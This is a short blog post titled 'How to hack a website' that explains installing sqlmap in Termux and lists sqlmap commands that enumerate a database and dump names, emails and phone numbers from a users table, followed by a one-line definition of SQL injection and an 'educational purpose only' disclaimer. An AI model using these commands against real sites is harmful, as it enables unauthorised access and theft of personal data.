Header Ads Widget

Ticker

6/recent/ticker-posts

HOW TO HACK A WEBSITE | Nur Tech Solution

 


How to install SQLMAP in termux:


1. apt update && apt upgrade
2. apt install python
3. apt install python2
4. apt install git
5. git clone https://github.com/sqlmapproject/sqlmap
6. cd sqlmap
7. Python2 sqlmap.py


Exemple:
Python2 sqlmap.py -u website –dbs
-D acuart –tables
-D acuart -T users –columns
-D acuart -T users -C name,email,phone -dump


SQL injection is a code injection technique, used to attack data driven applications, in which malicious SQL statements are inserted into an entry field for execution (e.g. to dump the database contents to the attacker).


*This is for Educational purpose only, I am not responsible for what you do.


Post a Comment

0 Comments